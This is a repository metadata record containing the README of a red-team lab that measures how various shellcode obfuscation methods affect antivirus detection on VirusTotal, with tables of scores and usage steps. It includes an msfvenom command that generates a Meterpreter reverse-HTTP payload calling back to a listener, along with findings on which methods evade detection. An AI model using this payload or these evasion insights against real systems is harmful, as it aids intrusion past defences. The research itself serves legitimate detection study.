{"id":28725058,"url":"https://github.com/dobin/shellcodeobfuscationlab","last_synced_at":"2025-06-15T11:09:50.801Z","repository":{"id":294413165,"uuid":"986892303","full_name":"dobin/ShellcodeObfuscationLab","owner":"dobin","description":"Test bench lab for Shellcode Obfuscation","archived":false,"fork":false,"pushed_at":"2025-05-20T09:24:10.000Z","size":323,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-05-20T10:37:35.679Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dobin.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-20T09:18:20.000Z","updated_at":"2025-05-20T09:24:13.000Z","dependencies_parsed_at":"2025-05-20T21:33:13.330Z","dependency_job_id":null,"html_url":"https://github.com/dobin/ShellcodeObfuscationLab","commit_stats":null,"previous_names":["dobin/shellcodeobfuscationlab"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/dobin/ShellcodeObfuscationLab","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab/manifests","owner_url":"https
://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dobin","download_url":"https://codeload.github.com/dobin/ShellcodeObfuscationLab/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dobin%2FShellcodeObfuscationLab/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259964324,"owners_count":22938726,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-06-15T11:09:49.979Z","updated_at":"2025-06-15T11:09:50.793Z","avatar_url":"https://github.com/dobin.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# SOL ShellcodeObfuscationLab\n\nShellcode obfuscation laboratory based on RedSiege [Chromatophore](https://github.com/RedSiege/Chromatophore/). \n\n\n## Background\n\nI see RedTeam research like [Adventures in Shellcode Obfuscation!](https://redsiege.com/blog/2024/09/adventures-in-shellcode-obfuscation-part-14-further-research/), a \n[14 part series](https://redsiege.com/adventures-in-shellcode-obfuscation/)\non hiding shellcode using various encryption or encoding ciphers. \n\nIn the security scene, the myth persists: how you encode a shellcode has an\ninfluence on the detection rate. The assumption is that somehow an AV or security software\nhas a unique ability to automagically reverse engineer encryption ciphers, and also\nhas a quantum computer integrated to crack the key. \n\nThe truth is: AV doesn't know shit. 
\n\nRedSiege came to the following wrong result:\n\n| Technique          | VT Score |\n| ------------------ | -------- |\n| XOR Multibyte Key  | 2        |\n| Offsets            | 2        |\n| Jargon             | 3        |\n| Reverse Byte Order | 4        |\n| Jigsaw             | 4        |\n| Reversed Byte XOR  | 5        |\n| IPv4               | 6        |\n| MAC Address        | 6        |\n| Caesar             | 7        |\n| RC4                | 7        |\n| XOR                | 8        |\n| AES                | 8        |\n| Two Array          | 8        |\n| Reverse String     | 13       |\n| UUID               | 13       |\n| Base64             | 18       |\n| No Obfuscation     | 27       |\n\n\nBut they didn't attempt to question the data. There are some issues with it: \n\n* Why are the top three Base64, UUID, and reverse hex string? Especially the latter is very obscure\n* No negative test (without malicious shellcode)\n* Some programs are written in C, some in C#\n* Some use WinAPI (AES, RC4, UUID), which is either an IOC or may block the AV emulator\n* ReverseXor brute forces the key\n* In jargon.c they mention that Defender detects the decryption routine itself. Same in xor_multibyte\n* As they store the shellcode in a variable, static analysis tools can try their deobfuscation on all the variables (explains the high detection of ReverseString and Base64)\n* Scans performed with large intervals between them (weeks?)\n\nThis means the test was performed incorrectly, the results are invalid, \nand conclusions based on the data are misleading. \n\nLuckily RedSiege published the [shellcode encoder sources](https://github.com/RedSiege/Chromatophore).\nI made this framework based on it to test it for myself. 
\n\n\n## Predictions\n\n* Which encryption you use doesn't matter: they are all equally resistant to analysis\n* Using Windows APIs will increase the detection rate\n\n\n## Results\n\nTests have been performed with either \"random\", an alphanumeric 20-byte string used as \"shellcode\", or \"metasploit\", \nthe output of `msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.190.134 LPORT=80 -f raw -o beacon.bin`. \nThe \"metasploit\" variant does not execute the shellcode; it only decodes and prints it. \n\nConclusion: \n* The type of encoding/encryption doesn't matter\n* What matters more is whether a Windows API is used/imported (static analysis, e.g. the IAT in the PE)\n* Note that the \"NO-obfuscation\" (plaintext) metasploit sample outperforms AES encryption, the base64 Windows API, and ip-, mac- and uuid-encoding\n* VirusTotal has maybe one memory scanner. The rest seem to be static analysis. \n\n| **What**           | **Library**           | **Includes**              | **Function / IAT**                 | **Random** | **Metasploit** |\n| ------------------ | --------------------- | ------------------------- | ---------------------------------- | ---------- | -------------- |\n| [aes](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/aes_work.c)                | crypt32.lib, advapi32 | wincrypt.h                | Crypt\\*                            | **5**          | **6**              |\n| [base64](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/base64_work.c)             | \\-                    | \\-                        | \\-                                 | 3          | 3              |\n| [base64api](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/base64api_work.c)          | crypt32.lib           | wincrypt.h                | CryptStringToBinaryA               | **5**          | **6**              |\n| 
[bin2ip](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/bin2ip_work.c)             | Ntdll.lib             | ntstatus.h\u003cbr\u003eIp2string.h | RtlIpv4StringToAddressA            | **8**          | **10**             |\n| [bin2mac](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/bin2mac_work.c)            | Ntdll.lib             | ntstatus.h\u003cbr\u003eIp2string.h | RtlEthernetStringToAddressA        | **8**          | **18**             |\n| [caesar](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/caesar_work.c)              | \\-                    | \\-                        | \\-                                 | 2          | 2              |\n| [jargon](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/jargon_work.c)             | \\-                    | \\-                        | \\-                                 | 3          | 2              |\n| [jigsaw](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/jigsaw_work.c)             | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n| [offset](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/offset_work.c)             | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n| [rc4api](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/rc4api_work.c)             | \\-                    | \\-                        | GetProcAddress (SystemFunction033) | 2          | 2              |\n| [reverse_byte_order](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/reverse_byte_order_work.c) | \\-                    | \\-                        | \\-                                 | 2          | 2              
|\n| [reverse_hex_string](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/reverse_hex_string_work.c) | \\-                    | \\-                        | \\-                                 | 2          | 2              |\n| [twoarray](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/twoarray_work.c)           | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n| [uuidapi](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/uuidapi_work.c)            | rpcrt4.lib            | rpc.h                     | UuidFromStringA                    | **8**          | **11**             |\n| [xor_multibyte](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/xor_multibyte_work.c)      | \\-                    | \\-                        | \\-                                 | 1          | 2              |\n| [xor_reverse](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/xor_reverse_work.c)        | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n| [xor_single](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/xor_single_work.c)         | \\-                    | \\-                        | \\-                                 | 1          | 3              |\n| [**NO OBFUSCATION**](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/noobfuscation_work.c)     | \\-                    | \\-                        | \\-                                 | 2          | 3              |\n\n\nThe results of the test are at [lab_results/](https://github.com/dobin/ShellcodeObfuscationLab/tree/main/lab_results). 
\nFor example the generated [aes.c source code](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/aes_work.c),\nand its [VirusTotal result](https://github.com/dobin/ShellcodeObfuscationLab/blob/main/lab_results/metasploit/aes.exe.json).\n\n\n## SOL Usage\n\nUse the `x64 native tools command prompt` from Visual Studio so you have access to `ml.exe` and `Windows.h`. \n\nTo compile all the source from `chromatophore/` into `output/*.exe`:\n```\n\u003e python.exe sol.py compile\n```\n\nTo send all the exes to VirusTotal:\n\n```\n\u003e set VT_API_KEY=123...\n\u003e python.exe sol.py vt\n```\n\nOutput is in `output/*.exe.json` and `output/scan_results.txt`. \n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdobin%2Fshellcodeobfuscationlab","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdobin%2Fshellcodeobfuscationlab","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdobin%2Fshellcodeobfuscationlab/lists"}